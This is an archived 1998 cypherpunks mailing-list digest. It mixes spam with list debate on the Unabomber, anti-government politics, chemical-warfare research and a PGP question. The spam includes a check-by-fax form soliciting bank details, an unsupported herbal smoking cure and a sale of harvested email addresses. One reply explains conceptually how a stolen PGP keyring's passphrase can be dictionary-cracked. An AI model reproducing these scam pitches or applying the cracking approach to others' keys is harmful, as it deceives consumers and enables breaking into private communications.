No more waiting to get paid. No more waiting for that "check in the
mail".

Checker will work with any inkjet or laser printer. You can use
inexpensive
check paper available at any print shop or simply use the paper you
use
every day.

Checker maintains a database of every check that you've printed and
it will
even print your own blank checks. No more ordering expensive refills
from 
the bank!

Checker is extremely user friendly and comes complete with a 
comprehensive support help file. It runs on any Windows 3.x or
Windows 95
computer.

Checker is shipped on a standard 3.5" diskette or can be sent as a
file
attachment to your E-mail address. Or you can download it from our
private site,
Your Choice!

Checker is now available to you through TDN Publishing for only 
 *** $14.95 ***.Similar check management systems can cost as  much
as
$200.00!!! Checker is ideal for individuals and businesses looking
to save
 money.

Thats right! Only $14.95 !!!!

This is the full registered version of Checker, not a crippled demo.
You'll 
be accepting checks and depositing them into your account
immediately!

To Order by Mail please send your check or money order to:
If ordering outside the United States we can only accept
International
Bank Drafts or International Money Orders as payment.
TDN Publishing, Inc.
Box 642
Destin, Florida 32540-0642
Fax: (850)-837-0367

Please include your Name, phone number, E-mail, and postal address.
Please check how you would like to receive your Checker Software:
Send to my E-Mail address as a file attachment   (  )
Send by U.S. Mail to my postal address               (  )


Or you can of course order using CHECK-BY-FAX

                    ******* CHECK-BY-FAX *******
                     ***** PAYMENT SYSTEM *****

This is the preferred payment method at TDN Publishing! 
If you are ordering outside the United States we can only accept
payment
by International Bank Draft or International Money Order.  Your
order can be
received 24 hours a day and will be shipped immediately!


cut
here______________________________________________________________>

          **********  CHECK-BY-FAX ORDER FORM **********
You must complete the entire form or your order can not be
processed. 
You will need to tape or paste a check in the blank space below.
Fill 
out and sign the authorization section below, and fax the ENTIRE
FORM 
to (850) 837-0367. 

PRODUCT/SERVICE You are ordering: Checker software.
Please check how you would like to receive your Checker Software:
Send to my E-mail address as a file attachment (  )
Send via U.S. Mail to my postal address            (  )
I would like to DownLoad the Software on my own time, please send me
the address.    (  )

First Name:
__________________________________________________________

Last Name:
___________________________________________________________

Street Address:
______________________________________________________

____________________________________________________________________
__

City:
________________________________________________________________

State: _____________________            Zip:
_________________________

Phone Number:
_______________________________________________________

EMail Address:
_______________________________________________________

     * * * * * * * * * *  Authorization  * * * * * * * * * * 

I, ______________________________________ hereby authorize TDN 
Publishing, Inc. to withdraw $_____________________________ from my
checking
account, account information enclosed, one time only, for the
purchase 
of Checker check printing software.
I have read and I understand the terms and conditions as stated
above. 
The signature below is the authorized signature of the holder of the
 
checking account.  
Authorized Signature
_________________________________________________

Date: __________________ 


Attach Voided Check Here!





*******
TO BE REMOVED FROM OUR MAILING LISTS SEND EMAIL TO 
MAILTO:REMOVE@DEAA.ORG with your email address as the subject
*******





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 40264587@usa.net
Date: Sun, 1 Mar 1998 08:18:47 -0800 (PST)
To: URFRIEND@myplace.com
Subject: STOP SMOKING ...SECRET!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


IF YOU SMOKE , PLEASE READ THIS CAREFULLY!  YOU TOO 
CAN STOP SMOKING EASILY WITH A NEW CHINESE SMOKER'S 
HERBAL AROMA THAT IS NOW AVAILABLE IN THE UNITED
STATES.

This amazing new product has successfully helped  at least 90% of 
those who use it consistently.

"I lost the desire for smoking almost immediately.  When I occasionally
would smoke, the cigarette had no taste and was not fun to smoke.  
After three days, whenever I wanted to smoke I would smell the bottle 
and lose the desire."
Robert F.- Newmanstown, PA.

"I smoked for 15 years.  This product completely took away my desire to
smoke. two days, I cut my smoking in half.  Then I stopped completely! 
 I have never used a product with such power .  I recommend it to any 
smoker who wants to quit."
Michele G., Fairfield, Iowa

   The majority of people who smoke cigarettes would like to quit. Are
you one of these people, or are you too disheartened by the cost of other
failures?

The patch and the nicotine gums are of a certain time limit and can be
very costly.  They also add to the nicotine in your bloodstream.  This new
product is a one time purchase for the majority of people. Think of what it
costs to use the other alternatives.

 This purely natural product acts like nicotine in the bloodstream.  The
small bottle fits easily in your pocket and your purse.   After merely
inhaling  the fragrance  4-10 times a day for about one minute,  the effect
builds day by day.  Usually after 3 or 4 days, your body feels like it already 
has consumed 15 cigarettes.  It is a simple process and can be used in all 
situations where you are forbidden to smoke!  This, for many people relieves 
much stress in the work and social world.

"I was going crazy in meetings, in airplanes, and fancy restaurants.
Now I carry my small bottle wherever I go and can use it everywhere.  It has
helped immensely. "
John M., Boulder, Co.

"I was not ready to quit.  I started to use the product several times a
day and loved the minty aroma.  I felt better immediately.  I cut back from
almost a pack a day to  about 6. " 
 Sandra J.  Denver, Co.

   In each study done in China, over 90% of the people who used the
product consistently, were able to either stop  entirely or cut back to only 2-3
cigarettes a day in 2 weeks.  After 2 months,  80% had quit entirely and
the rest were smoking only 5 a day.

   You too can quit easily with this new product.  It is so simple and
easy to use.

   THIS UNIQUE PRODUCT IS NOT AVAILABLE IN STORES.
   SMOKER'S HERBAL AROMA IS AVAILABLE FOR ONLY $35.00

 You can order this amazing product by calling (303)494-8455 or by fax
(303)499-7398, or email delray4@juno.com, or by mail to Delray Co., 4335

Butler Circle,  Boulder, Co. 80303.  Please include the following
information:

NAME:_________________________________________________________
ADDRESS:_____________________________________________________
CITY;_______________________________________________________
STATE;-____________    ZIP:____________ PHONE:_______________________
PAYMENT BY____VISA      ____MASTERCARD     ____CHECK
CARD NUMBER_____________________________________
EXP. DATE______________________________
QTY.____@ $35.00
SUB-TOTAL_______________
SHIPPING  $3.50 (add $1.00 for each additional bottle)______________
TAX (for Colorado residents only add $2.10 per bottle)____________
TOTAL :_________________

ORDERS ARE SHIPPED WITHIN 3 DAYS  BY PRIORITY MAIL






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 54689590@hotmail.com
Date: Sun, 1 Mar 1998 21:22:47 -0800 (PST)
To: URFRIEND@myplace.com
Subject: FREE SOFTWARE !!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


FREE SOFTWARE! BULK EMAIL TOOLS!

ALL YOU NEED FOR SENDING BULK E-MAIL & PROMOTING:

Hi my name is Jennifer, 

I have been searching for promotional tips for all my down line members.  Mostly, this centered
around ways to promote using bulk email responsibly.  I have finally come upon a site and 
service that provides all we need:

http://www.ezine-info.com  USE ID# 1363

Keep trying if sites are busy-it's worth it.

Check it out for yourself:

Bulk e-mail software:  E-MAIL BLASTER PLATINUM

FREE E-MAIL addresses to download-lots of 'em-FRESH 100,000's

All  sorts  of  other  tips  and  Free  software

Learn how to bulk e-mail responsibly

If  you  sign-up,  please  use  my  ID#   1363

It  is  the  best  I  have  found.

Thank you for your time.  

If you wish to be removed from *this* mailing list, please hit reply and type "REMOVE" in 
the SUBJECT field ( not the body ). Our servers will automatically remove you from
our list within 24hrs!  THANKYOU





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 1 Mar 1998 12:51:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Killing the Unabomber
Message-ID: <3.0.5.32.19980301125005.007e1c20@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>   >   : Didn't the government finally back down on their
>   >   : attempt to legally kill the Unabomber?  
>   >   This point strikes me as pretty funny.  Kinda like a nurse rooting
>   >   for Charles Starkweather.

>Or trying to be consistent.
>Raygun: abortion is killing, but pro-death penalty.
>If killing is wrong, killing again is wrong.

No consistency involved - many of them would like to kill him.
But they've Got Their Man, and he's made it clear that a trial
will be difficult, long, expensive, involve lots of firing lawyers
and arguing about mental competency, and generally be trouble,
and he's offered to plead guilty if they won't kill him.

Even though he's a highly intelligent cold-blooded killer,
he's also close enough to crazy that the public will have
enough sympathy for him that killing him won't be highly popular,
especially because his brother wouldn't have turned him in
if he'd expected him to be killed.

Also, while his killings have been somewhat scary and weird,
they haven't generated the kind of public outrage that the
OKCity bombing did, with dead babies on the front page of the papers.
The defendents there are going to get killed, and the public
is going to enjoy it, and the Neilsen Ratings will be high.

>Next time, the killer might not be caught because
>the person who recognized (yea traffic analysis)
>his talktalk might not want them killed as a result.
>i.e. in the long run it will save lives.

I think you're right here.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Sun, 1 Mar 1998 13:39:31 -0800 (PST)
Subject: 68 Million Email Addresses - 99.00
Message-ID: <199803012139.NAA17234@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


         68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 
HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other 
Internet Service Provider.

Copyright 1998

All rights reserved

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, 
or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a 
redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric Tune" <paladin@lvcablemodem.com>
Date: Sun, 1 Mar 1998 17:42:23 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Fw: Missing the Big Picture
Message-ID: <001b01bd457c$5e918be0$2a06ea18@paladin.lvcablemodem.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3990.1071713781.multipart/mixed"

--Boundary..3990.1071713781.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

William H. Geiger III said:
>    I have noticed that many members of the list are missing the "big
>picture" when it comes to fighting censorship.
>
>While I support the various efforts to combat the numerous attacks on
>personal liberties world wide it is all for nought unless we push for
>fundamental changes in government.
>
>There is an old saying: "Power corrupts, absolute power corrupts
>absolutely".
>
>So long as we have Statist governments (fascists, communist,
socialist,
>they are all the same) we will suffer a never ending infringement of
our
>basic civil liberties. You can not give a government overwhelming
powers
>to control every minute aspect of our lives and not expect them to
use it
>AS THEY SEE FIT.
>
>We go on wining little battles over this law or that law only to be
losing
>the war. Every year governments become more powerful, more
repressive,
>and are freedoms are curtailed even more. We need to strike into the
belly
>of the beast, and rip out it's hart. We must remove it's power to
tax, to
>regulate, to control only then will we be free.
>
>Not only must we castrate this beast leaving it a shell of it's
former
>self but we must stop being children and act like free men. We must
be
>willing to stand on our own and take our destinies into our own
hands. We
>must resist running to Big Brother every time we have a problem like
a
>small school boy running to mommy when he scrapes his knees.
>
>It is far better to try and fail as a free man than to have never
tried at
>all living the life of the slave.
>
>--


Well said William, very well said.  Free men must cooperate in their
own defeat, refuse to cooperate, refuse to give in, and you will not
lose.  In the end, tyranny will fall.

In the history of our civilizations, all governments have eventually
failed, regardless that they may have had noble intent in their
beginnings, and they have fallen.  So have each succeeding government
after them. They fail because when times passes, decades or centuries
(doesn't matter) the average citizenry becomes accepting and
complacent while said government becomes more and more abusive,
excessive, impulsive, and corrupt.  Finally, those people who can no
longer tolerate this from those who would call themselves their
rulers, rise to the occasion and the now festering, malignant
government is torn down.

Unfortunately, the cycle repeats itself.  The U.S. government has
lasted this long only due to the freedoms guaranteed by our
Constitution, but it still has been following in the tracks as all the
previous governments before it.  In lasting longer than any other
constitutional form of government, it is now so corrupt that at this
point only 1 of 2 things can really happen:  a 2nd American
Revolution, and hopefully a new start and (for the time being) a
change for the better, or total Fascism, and the last remaining
freedoms people have will be quickly extinguished.  I don't want to
live in a socialist environment.  I don't want somebody telling me how
to raise my children, and I don't want someone telling me I'm a
criminal because I don't want to let the government read what I have
to say.  It doesn't "Take a Village" and it doesn't take Big
Brother.... it takes freedom, ingenuity, drive, determination,
self-worth, cooperation, and dedication to build something better.

Scream to your Senators and Representatives, as loud as you can, we
all must do what we can, or we will be lost, and as William said, in
perpetual, permanent slavery, with no privacy, no rights, and no hope
for a self-determined future.  To hell with that.

Eric J. Tune


--Boundary..3990.1071713781.multipart/mixed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlBuZHlJOUNvMW4rYUxoaEFRRkJ1Z1FBeUd2
YjEvN0RqRFlkdFRUS1czSkJCUlpTZ29LT2JnK2QKaUZqQ3hib1FjeXExTFh3
OUhnZEVJNFV0UExHN1hKeEhqUEI1VThCMkVEOFdsT2tCSHBqUlpEc3h4aVh0
VnBtbwp6TlAwU2d6STQ3ZXhTdVhJMkhMWU5KNE1DWWl4SStSZmxTQ3FTc1BK
M2Nid3Bxb0ZuM3VhUTdkUDRKSGFxSlNvCng5dUI0UmRaVlZnPQo9bU9qWQot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713781.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Sun, 1 Mar 1998 18:20:49 -0800 (PST)
Subject: Accept this FREE gift-FREE  1 HOUR LD CALLING CARD
Message-ID: <199803020220.SAA09288@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



FAST EARTH CASH AND A FREE  1 HOUR LD CALLING CARD TO
THE FIRST 300 EMAIL FRIENDS WHO RESPOND TO THIS OFFER!

A new revolution is coming to America.  One simple fact. . . . . . . . . 
There is a new way to wash clothes without soaps or detergents and
earn a KINGS RANSOM from working at home!!! A new study links skin,
liver and kidney cancer to most soaps and detergents in use now!!!  Our
plan is the fastest and easiest in the U.S.A.  $30,000, $70,000, $100,000
per month is possible within 6 months.  Our unit saves soap, water, energy 
and time.  We would love to show you how we did it.  Please  717-288-0400
with your name, address, phone and fax number so we can speed you this fun,
educational and futuristic info pack!  We need your fax number to fax you 
the calling card.  Accept this FREE gift for reviewing our info pack.  We
have the lowest LD rates in the nation. . . 7.9 cent LD, 5 cent local!  We can
help you save and make thousands per year!!!  Let's help SAVE the PLANET.

 phone # 717-288-0400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 1 Mar 1998 18:18:56 -0800 (PST)
To: wire@monkey-boy.com
Subject: sick feeling
Message-ID: <34FA16FB.3668@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Subject: 
        Halabja, Iraq and what you wrote
  Date: 
        Sun, 01 Mar 1998 18:58:39 -0700
  From: 
        bill payne <billp@nmol.com>
    To: 
        L E Banderet <lbanderet@natick-ccmail.army.mil>


Sunday 3/1/98 6:33 PM

Lou

Got your stuff on Saturday.

Patty and I both commented on the picture of your 
lovely new wife.

And I was  pleased that you had authored or co-authored
85 publications. 

This is what I was supposed to train you for.

Patty and I watched 60 Minutes tonight and what happened in 
Halabja, Iraq.  

The IMMEDIATE and LONG TERM effects of a combination 
mustard and sarin gas attack on genetics.

Last night I transcribed some of your and you co-authors' words.

Volume 9, Number 4, 1997

  MILITARY PSYCHOLOGY

  The Official Journal of the 
  Division of Military Psychology
  American Psychological Association

  Special Issue:  Effects of Chemical Protective
                  Clothing of Military Performance
  Guest Editors:  Gerald P. Krueger and
                  Louis E. Banderet

         Psychological Aspects of Chemical Defense and Warfare

        James W. Stokes
        U.S. Army Medical Department Center and School
        Fort Sam Houston, Texas

        Louis E. Banderet
        U.S. Army Research Institute of Environmental Medicine
        Natick, Massachusetts

  Concerns about chemical, biological, or radiation (CBR) weapons  and 
  their potential for warfare can be very stressful.  Such concerns
  subject  people to unfamiliar threats in highly ambiguous situations,
in which 
  people feel they may be wronged or they are helpless.  Maladaptive
  psychological overreactions or underreactions may result.  Such
  reactions to chemical warfare are illustrated with the experience from
World War
  I,  the 1991 Persian Gulf War, and the 1995 terrorist attack in the
Tokyo
  subway.  General principles of psychology suggest strategies and
  tactics for training and materiel development that should enhance
military
  performance and reduce maladaptive stress in CBR threat situations. 
Some of these
  practices  may be relevant to nonmilitary law enforcement and relief
agencies
  that manage CBR threats.

page 395.

Now I transcribe some of the more relevant stuff.

  Effects of Chemical Protective Clothing on Military Performance:

  A Review of the Issues

  Gerald P. Krueger
  Star Mountain, Inc.
  Alexandria, Virginia

  Lous E. Banderet
  U.S. Army Research Institute of Environmental Medicine
  Natick, Massachusetts
        
  This review in this special issue of Military Psychology on the
  effects of chemical protective clothing (CPC) on military performance
provide a historical
  perspective on continued anxieties over likely use of battlefield
  chemical-biological weapons and summarizes significant concerns of
military personnel weaning CPC in
  training and combat.  This review describes pschophysiological
stresses such
  protective ensembles have on personnel and how these affect military
performance, and it
  summarizes major military psychological research program on the effect
of wearing CPC. 
  This article reviews what is known about wearing CPC, describes future
CPC
  developments, and  identifies domains for improved military training
with CPC.

              MEDICAL AND PSYCHOLOGICAL EFFECT 
              OF C-B WEAPONS

  There are many medical, physiological and psychological reactions from
  exposure to chemical-biological (C-B) weapons.  Many bio-warfare
agents and most
  chemical weapons are designed to interfere with function of the
nervous system and to
  disrupt normal control of vital organ systems that sustain life.  For
example,  the more
  common chemical war nerve agents involve organophosphate compounds, 
similar to
  insecticides, that inhibit  cholinesterase enzymes throughout the
body.  Because cholinesterase
  hydrolyzes acetylcholine where ever liberated, this inhibition 
results in
  excessive concentrations of acetylcholine at various sites - from the
ending of the
  parasympathetic nerves to smooth muscles of the iris, ciliary body,
bronchi, gastrointestinal trace,
  bladder, and blood  vessels; to secretary gland of the respiratory
tract' and to endings of the
  sympathetic nerves to sweat glands (Newhouse, 1987; Simmons et at
1989).  Exposure to large
  amounts of nerve agent may lead to loss of muscle control, twitching,
paralysis,
  unconsciousness, convulsions, coma, and even death.  The most common
cause of death after acute
  exposure is respiratory arrest.  Death may occur within minutes or
take several hours.
     In terms of psychological functioning, moderate but nonlethal
  exposure to nerve agent produces severe impairment in cognition,
vigilance, memory and
  language.  Acute intoxication produces confusion, drowsiness, and
difficulty in
  concentration (Newhouse, 1987).  These impairment make it difficult to
continue to perform may
  soldier tasks. Effects on cognition may persist after only a slight
exposure. 
  Performance improvement appears to correlate with the body's
regeneration of
  acetycholinesterase, usually requiring several months.
    Neurophysychological testing (Newhouse, 1987) reveals that chronic
  exposure to  organophosphates significantly impairs higher mental
function
  requiring use of the frontal lobes, particularly the left lobe. 
Organophosphate poisoning
  selectively  impairs memory of recently learned information, and this
impairment is likely related to
  cholinergic involvement in the memory processes.  The effects include
defects in long-term
  memory, visual searching, and response alteration - effects similar to
those caused by a frontal
  lobotomy.  In chronically exposed individuals, speed of task
performance and overall cognitive
  efficiency also declines. Persistent visual impairments are reported
in workers poisoned with
  anticholinesterase insecticides, and acute poisoning impair oculomotor
function. 
  Poisoning with nerve agents may also cause psychiatric disturbances
such as depression.
    Use of C-B weapons results not only in large number of physical
  casualties on the battlefield by in may psychological casualties as
well.  Concern over the mere
  threat that C-B weapons might be used raises battlefield anxiety of
combatants and can produce
  a level of fear disproportionate to that evoked by countless
alternative conventional
  battlefield means of killing or maiming, such a with guns, artillery,
and bombs.  Such
  anxieties can create large numbers of psychological stress casualties
contribution to unit
  ineffectiveness on the battlefield and combat losses.  Such adverse
emotions may also cause posttraumatic
  stress disorders after combat ceases.
                
                DEVELOPMENT OF COUNTERMEASURES
                FOR THE COMBAT THEATER

   Modern military forces recognize the C-B weapons can be the
  attention-getting equivalent of a poor country's nuclear weapons. 
Such weapons can be
  counter-acted, however, and concerned nations prepare their forces to
preserve their health and
  safety against C-B warfare.   ...

                        THE THREAT OF C-B WARFARE

  Although biological warfare was used centuries ago by the Romans and
  was used in the 14th century by the Tartars, who catapulted
plague-infected bodies
  into cities under siege (Hewish, 1997),  military forces have made
scant use of
  biological warfare in modern times.  The more recent innovation of
chemical warfare dates to 1914
  when the French used tear gas against unprotected German forces, who
in turn introduced
  chlorine and phosgene in 1915 and mustard gas in 1917 against the
British, who sustained
  14,000 casualties in 3 months (Hewish, 1997).  May World Ware I
soldiers were grotesquely
  injured or died in gas war trenches in France and Russia;  Russia's
gas casualties exceed a
  half million, including 50,000 fatalities (Westerhoff, 1980).
    In 1925, many countries signed a Geneva Protocol prohibiting first
  use of chemical and bacteriological weapons.  However, during the
1930s, several
  countries, notably Germany, encouraged chemists to develop chemical
weapons as a by-product of
  insecticide research production.  By World War II, Germany and powers
stockpiled huge
  caches of chemical, but probably due to fear of in-kind retaliation,
chemical weapons were not
  used in World War II.
    After the war, Germany's organophoshporous arsenal fell into Russian
  hands, and for the next 50 years, military forces relegated C-B
warfare efforts to relatively
  quiet development programs for future battlefields.
    Since World War II, C-B weapons have been employed several times on
  a relatively small scale.  In the 1970s, the Vietnamese used chemical
and "yellow rain"
  biological agents in Cambodian jungles, the Soviets used chemical in
Afghanistan (U.S.
  Department of State, 1980), Iraq used sulfur mustard  and other
chemical in the Iran-Iraq
  conflict (1979-1980), and Iraq used chemical in 1980 - this time
against its own people, the
  northern Kurds (Stuteville, 1997).
    There have been periodic threats to use chemical weapons on a grand
  scale.  In the 1970s, the Warsaw Pact possessed huge stockpiles of
chemical weapons (
  mostly soman, cyanide, and mustard gas), and Soviet chemical warfare
teams openly
  conducted extensive training in gas warfare tactics.  Such readiness
for large scale C-B
  warfare was underscored in the Persian Gulf War of 1991, as Iraq
threatened to use chemical
  (sarin) and biologicals (anthrax spores) against coalition forces and
possibly against
  neighboring cities in Saudi Arabia and Israel (Begley, Barry,  &
Hager, 1991).  By January 1991,
  Saudi Arabia had predug 50,000 graves planned for burying civilian
(noncombat)
  casualties expected to succumb to Iraqi chemical poisoning from
anticipated rocket attacks on
  Saudi cities oraerosols drifting from the battlefields (Kaplan, 1991).
    Although Iraq did not unleash such chemical, and the battles were
  ultimately short, many U.S. military personnel may been exposed to
chemical during the
  March 1991 destruction of Iraqi weapon stockpiled (mostly sarin) near
Khamisiyah,
  Iraq (Stuteville, 1997).  The U. S. government continue to investigate
whether exposures
  to chemical agents may have contributed to the so-called Gulf War
illnesses
  experienced by many U.S. military veterans of that encounter. 
Exposure of soldiers to
  multiple chemical and and environmental stressors may be linked to
psychophysiological
  illnesses that manifest in symptomatology such as disabling fatigue,
insomnia, malaise, joint
  and muscle pains, skin sores, hair loss, and gastrointestinal and
respiratory
  difficulties (Brown & Priest, 1996).  Others asset that U.S. military
personnel were exposed
  to Iraq chemical warfare from Scud missiles, artillery and aircraft
(Stuteville, 1997)

                        PUBLIC CONCERN

  Open, frank, public news of existent military chemical stockpiles,
  proliferation of chemical or biological weaponry, and periodic
'saber-ratting' threats to use
  such weapons amplify world public concerns over the enormity of what
someday could be a horrific
  chemical or biological calamity.  Unprotected civilian populations
fear they may be
  deliberately attacked by chemical and biological weapons or
inadvertently by aerosol warfare
  agents drifting into populated areas of a battlefield.  Disastrous
incident like the one in
  1984 at a chemical actory in Bhopal, India, which killed over 2,000
people and sickened  
  countless others, sensitized citizenry to the lethal potential of such
chemical
  compounds.  In 1995, terrorist attacks on the Tokyo subway, and news
media discussion of possible use
  of nerve agents in terrorist disruption of public gathering like the
1992 and 1996
  Olympics, heightened Public fears over such chemical incidents have
become almost visceral.  News
  of recent advances in genetic technologies (Dando, 1997)  suggest use
of future
  biological weapons with unprecedented insidiousness and specificity is
possible.  Moreover,
  the mass media and media expert sources remind the public that the
United States  may not be
  adequately prepared or trained to defend itself against chemical or
biological warfare (Beal,
  1997).  ...

I got a sick feeling when Hans Buehler phoned from Zurich on why he was
jailed in the Evin prison in Tehran.

You failed to mention the long-term effects of mustard-sarin.  

Or how the suits were to protect against biological weapons.

I have an even more sick feeling now.  

bill

Title: Untitled Document









Viewing this page requires a browser capable of displaying frames.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Hall" <stevehall@csi.com>
Date: Sun, 1 Mar 1998 16:38:07 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: I'd like to join your mailing list...
Message-ID: <01bd4573$52367c60$b1aaaccf@p2>
MIME-Version: 1.0
Content-Type: text/plain




    I read 
about your mailing list in The Happy Mutant Handbook, and I am inclined 
to get on the list.  Address is <A 
href="mailto:stevehall@csi.com">stevehall@csi.com 
.


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cyper punks <cypherpunks@yahoo.com>
Date: Sun, 1 Mar 1998 20:24:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: cypherpunks@yahoo.com
Message-ID: <19980302042425.8339.rocketmail@send1b.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi cypherpunks,

cypherpunks@yahoo.com is running!

whom created cypherpunks@yahoo.com




_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WhatsMetaU <WhatsMetaU@aol.com>
Date: Sun, 1 Mar 1998 18:31:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fw: Missing the Big Picture
Message-ID: <549d66e3.34fa19be@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-01 21:16:04 EST, paladin@lvcablemodem.com writes:

<< >    I have noticed that many members of the list are missing the "big
 >picture" when it comes to fighting censorship. > >>

You want to see the big picture?  See my front page -

http://members.aol.com/StanSquncr/

And if there are any " ... heads" on this list, you ain't got one.

Stanley Rosenthal, saver of lists
'Methods of Moder(atio)n Censorship'
http://members.aol.com/WhatsMetaU/ofir.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 2 Mar 1998 00:26:08 -0800 (PST)
To: Mike <cypherpunks@toad.com
Subject: Re: Newbie pgp question
In-Reply-To: <34FA122A.74E4@mail.nevalink.ru>
Message-ID: <3.0.5.32.19980302002230.0092c210@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:58 AM 3/2/98 +0300, Mike wrote:
>I need - well, it sounds funny - to crack PGP-encrypted text ;)
>I have secring.pgp but not the keyphrase - does it make things easier or not?
>I also have pgpcrack99.zip (DOS-version, zip means that I unzipped it
>for the 1st time :)  But I guess it will take megahours with big
>dictionary - and it will cover only single words, not sentences.
>Please, can somebody introduce me a little?

Remember how PGP works:
PGP picks a random session key, and encrypts it with the public key
of the recipient (using RSA or a Diffie-Hellman version),
and encrypts the message with the session key.
The recipient's private key is encrypted with the passphrase
for the private key and stored in secring.pgp.
When the recipient wants to decrypt the message, they type
their passphrase into PGP, which decrypts the private key
from the secring and uses it to decrypt the session key from the message,
and uses the session key to decrypt the message body.

The session key is long, and you won't crack it.
RSA depends on factoring big numbers, and if the user has a 512-bit
public key or a longer public key _you_ won't be able to crack it.
(The KGB might*, and a distributed internet crack might, but you won't.)
But the passphrase for decrypting the private key from the secring file
is picked by the user - some users use short stupid keys, and 
other users use long difficult keys, and short stupid keys can be cracked.
The user needs to protect their secring file, to prevent this attack,
but if you have their secring, you can try to crack it.

If this is your _own_ secring, and you can't remember your passphrase,
it's easier, because you probably know what words you use in passphrases,
so your dictionary can be short and the crack can be fast.
If you stole somebody else's secring, or somebody else store yours,
then you have to guess what kind of dictionary to use.

This only works for the recipient's secring - if you steal the sender's
secring, even if you crack their passphrase, it doesn't help,
because that's only used when somebody sends them messages,
or when they sign messages (and now you can forge them.)

*I assume you're not the KGB or Mafia, because then you would just
beat up the guy until he gives you the passphrase.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
